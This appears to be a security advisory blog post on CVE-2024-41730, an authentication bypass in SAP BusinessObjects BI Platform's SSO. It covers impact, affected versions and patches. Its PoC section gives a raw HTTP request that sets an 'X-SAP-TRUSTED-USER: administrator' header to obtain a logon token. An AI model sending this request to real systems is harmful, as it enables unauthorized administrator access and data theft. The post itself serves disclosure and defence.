On August 13, 2024, SAP released a critical security patch addressing a severe authentication vulnerability in SAP BusinessObjects Business Intelligence Platform. This blog post aims to provide an overview of the vulnerability, its potential impact, and steps for mitigation.
Vulnerability Details
- CVE ID: CVE-2024-41730
- CVSS v3.0 Base Score: 9.8 (Critical)
- Affected Component: SAP BusinessObjects Business Intelligence Platform
- Vulnerability Type: Missing Authentication Check
Description
The vulnerability affects the Single Sign-On (SSO) functionality of the Enterprise authentication in SAP BusinessObjects Business Intelligence Platform. An unauthorized attacker can exploit this vulnerability to obtain a logon token using a REST endpoint, potentially leading to full system compromise.
Impact
If successfully exploited, this vulnerability can have severe consequences:
- High impact on confidentiality: Unauthorized access to sensitive business intelligence data
- High impact on integrity: Potential manipulation of BI reports and data
- High impact on availability: Possible disruption of BI services
The critical CVSS score of 9.8 underscores the severity of this vulnerability and the urgent need for patching.
Affected Versions
- ENTERPRISE 430
- ENTERPRISE 440
PoC
GET /biprws/logon/trusted HTTP/1.1 Host: SAP_BOBJ:6405 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Upgrade-Insecure-Requests: 1 Priority: u=0, i X-SAP-TRUSTED-USER: administrator
Mitigation
SAP has released patches to address this vulnerability. The Single Sign-On Enterprise authentication is now secure by default after applying the patch.
Patch Information
Patches are available for the following versions:
- SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP005
- SBOP BI PLATFORM SERVERS 2025 – Patch Level SP00
- SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP004
It is strongly recommended that all affected organizations apply these patches as soon as possible.
Workaround
SAP has not provided any workaround for this vulnerability. The only mitigation is to apply the provided patches.
Recommendations
- Identify all instances of SAP BusinessObjects Business Intelligence Platform in your organization.
- Prioritize the application of the security patches based on the criticality of the affected systems.
- Conduct a thorough security assessment of your BI environment to identify any potential compromise.
- Review and enhance your authentication mechanisms and access controls.
- Monitor system logs for any suspicious activities, especially those related to authentication and token generation.
Conclusion
The discovery of CVE-2024-41730 highlights the ongoing importance of robust security measures in business intelligence platforms. Organizations using SAP BusinessObjects Business Intelligence Platform should treat this vulnerability with utmost urgency and apply the patches immediately to protect their critical business data and operations.
